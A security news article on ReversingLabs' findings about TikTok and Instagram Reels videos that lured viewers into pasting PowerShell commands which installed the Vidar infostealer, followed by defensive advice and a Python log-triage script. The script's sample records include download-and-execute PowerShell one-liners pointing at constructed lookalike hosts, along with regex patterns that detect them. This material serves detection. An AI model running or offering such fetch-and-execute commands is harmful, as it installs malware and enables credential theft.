How TikTok and Instagram Reels were used to sell free software
Threat actors have been using short-form videos on TikTok and Instagram Reels to push the Vidar infostealer, disguising the attacks as tutorials that promise to unlock premium software for free, according to new analysis from ReversingLabs. The firm described two separate campaigns that manipulated platform recommendation algorithms to reach large audiences and funnel viewers to sites that peddle fake free software such as Spotify Premium.
The Vidar infostealer and the msget[.]run delivery
Vidar is described as a long-running infostealer sold as a service for a $300 lifetime license; it harvests credentials, financial data and authentication tokens. ReversingLabs reported that a refresh last October made the malware "stealthier." In the first campaign, near-identical accounts with names like "windows.tips" and a blue-and-white crown icon that aped an official Windows profile posted an AI-voiced clip that walked viewers through opening PowerShell and pasting a command.
That PowerShell command silently downloaded and ran a script from a lookalike domain, msget[.]run, a domain some mistook for a Microsoft address. The file pulled down by the script was Vidar, ReversingLabs found. The clips gained measurable traction: one tutorial exceeded 100,000 views, and to climb the algorithm the accounts chased saves and shares rather than likes—an approach reflected in one video logging nearly 1,700 saves alongside its six-figure view count.
Curiosity-bait comments, survey gates and d4ug[.]site
The second campaign looked less polished, the firm said. Ordinary-looking accounts posted music-backed clips that flaunted free Spotify Premium, then baited comments—sometimes asking viewers to reply with a word like "ok" to trigger a direct message with instructions. Those instructions pointed to sites such as d4ug[.]site that promised free games and AI tools but gated the download behind survey-after-survey.
ReversingLabs was unable to get past the surveys, so the final payload for the second campaign remained unconfirmed. The technique of using comment bait and gated sites is sticky: creators can delete warning comments, and ReversingLabs reported that its attempts to report posts to Instagram were rejected.
ReversingLabs' recommendations and practical defenses
To defend against this threat, ReversingLabs urged organizations to take concrete steps: audit who holds software-install privileges and what they are installing; refresh phishing training to cover social feeds as well as email and text; and encourage staff to report suspicious posts, even on personal accounts. ReversingLabs emphasized reporting as a practical mitigation: "The more reports, the more likely it is that the accounts are taken down, which does slow down the momentum of these attackers," the company wrote.
What this means for technologists, procurement leaders, and end users
- Technologists and security teams: Review and tighten who can install software and monitor for unusual PowerShell usage originating from user devices, particularly scripts that call out to domains that mimic legitimate vendors.
- Procurement leaders and IT managers: Reassess privilege and installation policies and add guidance on software obtained through social-media links: sites offering "free" premium software may gate downloads behind survey funnels that can hide malicious payloads.
- End users and employees: Treat social-media tutorials with the same skepticism as suspicious emails; do not paste PowerShell commands from short videos, and report posts that promise paid services for free.
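As an added example (not code from the ReversingLabs report or this article), a small Python triage routine that applies the first bullet above to constructed PowerShell Script Block Logging records: it flags download-and-execute one-liners and download hosts outside a vendor allowlist, and marks hosts whose leading label borrows a vendor name as lookalikes. The allowlist, vendor-token list and sample records are assumptions for the demonstration.

```python
import re
from urllib.parse import urlparse

# Constructed records shaped like Script Block Logging (Event ID 4104)
# entries: (workstation, user, script_text). Not real logs.
SAMPLE_EVENTS = [
    ("WS-0142", "alice", "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"),
    ("WS-0142", "alice", "iex (irm https://msget.example/activate.ps1)"),  # constructed lookalike host
    ("WS-0199", "bob", "Invoke-WebRequest https://www.microsoft.com/download/x.msi -OutFile x.msi"),
    ("WS-0203", "carol", "IEX (New-Object Net.WebClient).DownloadString('http://spotify-premium-free.example/run.ps1')"),
]

# Assumed allowlist of legitimate vendor domains; extend for your environment.
VENDOR_ALLOWLIST = {"microsoft.com", "windowsupdate.com", "spotify.com"}
# Tokens that lookalike domains borrow from real vendor names.
VENDOR_TOKENS = ("microsoft", "windows", "ms", "spotify")

# Download-and-execute cradle: Invoke-Expression combined with a fetch, in either order.
CRADLE = re.compile(
    r"(iex|invoke-expression)\b.*\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b|"
    r"\b(irm|iwr|downloadstring)\b.*\b(iex|invoke-expression)\b", re.I)
URL = re.compile(r"https?://[^\s'\"()]+", re.I)

def registrable(host):
    """Last two labels of a hostname (simplification: ignores multi-part TLDs like co.uk)."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()

def triage(event):
    """Return (severity, reasons) for one script block, or None when nothing is suspicious."""
    _workstation, _user, script = event
    reasons = []
    if CRADLE.search(script):
        reasons.append("download-and-execute cradle")
    for url in URL.findall(script):
        dom = registrable(urlparse(url).hostname or "")
        if dom in VENDOR_ALLOWLIST:
            continue  # known vendor, e.g. an installer fetched from microsoft.com
        label = dom.split(".")[0]
        if any(tok in label for tok in VENDOR_TOKENS):
            reasons.append(f"vendor-lookalike download domain {dom}")
        else:
            reasons.append(f"non-allowlisted download domain {dom}")
    if not reasons:
        return None
    return ("high" if len(reasons) >= 2 else "medium"), reasons

def scan(events):
    """Triage every record and return only the suspicious ones for analyst review."""
    return [(ws, user, *triage((ws, user, s))) for ws, user, s in events if triage((ws, user, s))]

if __name__ == "__main__":
    for ws, user, sev, reasons in scan(SAMPLE_EVENTS):
        print(f"{sev.upper():6} {ws} {user}: {'; '.join(reasons)}")
```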
ReversingLabs' analysis shows a bifurcated campaign: one tidy pipeline that delivered Vidar via a PowerShell command pointing at msget[.]run, and a second, more ad hoc pipeline that relied on comment bait and survey-gated sites such as d4ug[.]site—the latter's final payload left unconfirmed. The mix of algorithm gaming, lookalike domains and human curiosity made the campaign effective and difficult to police; for now, the firm concludes that vigilance and reporting are immediate, actionable defenses that can blunt attackers' momentum.
Full report: https://www.infosecurity-magazine.com/news/fake-software-videos-tiktok-vidar/